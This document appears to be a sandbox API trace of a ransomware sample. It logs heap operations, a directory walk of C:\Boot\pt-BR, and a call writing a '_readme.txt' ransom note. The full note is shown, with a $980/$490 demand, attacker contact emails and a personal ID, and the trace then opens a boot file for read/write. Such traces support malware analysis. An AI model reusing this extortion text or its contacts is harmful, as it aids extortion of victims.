RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0201.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0201.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.639] PathFindFileNameW (pszPath="C:\\Boot\\pt-BR\\") returned="pt-BR\\" [0201.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.639] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0201.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.639] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.639] PathFindFileNameW (pszPath="") returned="" [0201.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.639] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0201.639] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0201.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3b65058 [0201.640] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0201.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3b68060 [0201.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68060 | out: hHeap=0x2c0000) returned 1 [0201.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.640] FreeLibrary (hLibModule=0x75020000) returned 1 [0201.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x81c) returned 0x3b15070 [0201.640] PathAppendW (in: pszPath="C:\\Boot\\pt-BR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 1 [0201.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b158f8 [0201.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.640] PathFileExistsW (pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 0 [0201.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3b68060 [0201.640] lstrcpyW (in: lpString1=0x3b68060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0201.641] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0201.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b16180 [0201.641] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\_readme.txt" (normalized: "c:\\boot\\pt-br\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b16180 | out: hHeap=0x2c0000) returned 1 [0201.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68060 | out: hHeap=0x2c0000) returned 1 [0201.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.641] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.641] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.641] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0201.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced80 [0201.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.641] PathFindExtensionW (pszPath="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned=".mui" [0201.642] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced80 | out: hHeap=0x2c0000) returned 1 [0201.642] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0201.642] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0201.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0201.642] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0201.642] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.642] HeapFree (in: 